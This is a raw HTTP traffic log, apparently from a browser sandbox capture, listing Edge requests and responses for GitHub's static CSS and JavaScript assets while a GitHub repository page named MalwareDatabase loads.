content-length: 38163
-
GEThttps://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.cssmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Thu, 23 Jan 2025 00:57:09 GMT
etag: "0x8DD3B48DD72F969"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 600189
x-served-by: cache-iad-kcgs7200085-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 6, 1241
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6dfcfd945737ac9c843ee7da4c18786ef3c1b6a4
content-length: 21345
-
Remote address:185.199.109.154:443RequestGET /assets/primer-react.1cf896b6a5598ae0f649.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Mon, 27 Jan 2025 16:33:51 GMT
etag: "0x8DD3EF06259EC32"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 260997
x-served-by: cache-iad-kjyo7100076-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 96, 994
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 58c357502edd23f418c507ca8ae486990329e5d5
content-length: 5184
-
Remote address:185.199.109.154:443RequestGET /assets/code-0210be90f4d3.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 17 Jan 2025 17:06:48 GMT
etag: "0x8DD37195443E4FE"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1129391
x-served-by: cache-iad-kjyo7100163-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 64, 660
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a0728b60d05f273557327e643d3993c10618a0cc
content-length: 5189
-
Remote address:185.199.109.154:443RequestGET /assets/wp-runtime-98cdc9e8eb60.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 30 Jan 2025 18:56:08 GMT
etag: "0x8DD415FC1E1AA15"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 3957
x-served-by: cache-iad-kjyo7100134-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 7, 69
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 53c0cb0c073bb4cce2c36c72aeab779f6064b1a6
content-length: 14266
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E029647C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443370
x-served-by: cache-iad-kiad7000023-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 86, 1139
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 79cf9790b51786a9d30dac54c3f9492bf06c3c28
content-length: 3080
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:16 GMT
etag: "0x8DD15445FBFE222"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kiad7000130-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 18639, 1152
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c9229af4af2b47a49be9f11f95cdcfcc9584e8de
content-length: 4848
-
GEThttps://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-5ecd0f66e629.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_failbot_failbot_ts-5ecd0f66e629.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sat, 18 Jan 2025 01:17:07 GMT
etag: "0x8DD375DD3A1CB27"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 276230
x-served-by: cache-iad-kjyo7100110-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 8, 1339
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 0a9706b829e0908e83841848ee1111337e00e70e
content-length: 3634
-
Remote address:185.199.109.154:443RequestGET /assets/environment-31b06b039fca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 03 Jan 2025 21:10:51 GMT
etag: "0x8DD2C3B1AB7B5CF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 695593
x-served-by: cache-iad-kjyo7100116-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 62, 1230
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9a618fe19a75382fee0d50cf2600b015b978b8a8
content-length: 5794
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 23 Jan 2025 20:36:28 GMT
etag: "0x8DD3BED9D246E40"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 276230
x-served-by: cache-iad-kjyo7100077-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 8, 1330
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 48d28949a4e21338982456060a965b833a323001
content-length: 780
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 09 Dec 2024 18:22:05 GMT
etag: "0x8DD187E625ACB6B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kiad7000085-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 12223, 1151
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 131c3e3ea9522a3ad1dd18e7b025d6dac223f265
content-length: 4645
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12F8D41"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1329635
x-served-by: cache-iad-kiad7000168-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 10191, 1131
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e696fa8f518ad16a412508aea717f497c33d4a66
content-length: 3284
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B4500C5DFD"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1332639
x-served-by: cache-iad-kiad7000164-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 85, 1158
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 945cfbecb35132939a489819dec39e55462a550f
content-length: 4311
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 14:39:52 GMT
etag: "0x8DD0D5F05CBAB3B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443370
x-served-by: cache-iad-kiad7000130-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 81, 1151
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 877b770d6081d5d2c737b3e0d0efb4fc7110649c
content-length: 6786
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD15446030C279"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443368
x-served-by: cache-iad-kiad7000040-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 45, 1180
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d310a3f48f4ef535e2b873525487a73dc1859d44
content-length: 18635
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B44FAF168F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 828743
x-served-by: cache-iad-kiad7000037-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 48, 1145
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 93f624384ba394eb6b5359b766b59a7f319c2a33
content-length: 2385
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 10 Dec 2024 19:56:20 GMT
etag: "0x8DD1954B7817C15"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kjyo7100066-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 78, 1166
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7ae9b653f0d0adca199acadeecc634822364550a
content-length: 3683
-
Remote address:185.199.109.154:443RequestGET /assets/github-elements-ed51bf4a426a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 25 Nov 2024 15:32:27 GMT
etag: "0x8DD0D665E0F9ED8"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1443369
x-served-by: cache-iad-kcgs7200078-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 55, 1171
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 691078964322ec818bbf3e1341c0ed242ffce9b2
content-length: 5379
-
Remote address:185.199.109.154:443RequestGET /assets/element-registry-a7f13d843149.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 16 Jan 2025 17:15:14 GMT
etag: "0x8DD36515792307E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207986
x-served-by: cache-iad-kjyo7100170-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1223
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 56a5a1bf39956ac1bd63d25b1babc5474215cfd4
content-length: 27489
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:08 GMT
etag: "0x8DD34DA60C70F15"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207986
x-served-by: cache-iad-kjyo7100039-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 27, 1208
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c6d21e9107c63621510a358d72ddc7f78a43900b
content-length: 9522
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:41 GMT
etag: "0x8DD02B4500E579D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 206993
x-served-by: cache-iad-kjyo7100066-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 1658, 1151
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d4bd56b69b09571faad54e2986fa5fbadf4a339f
content-length: 3918
-
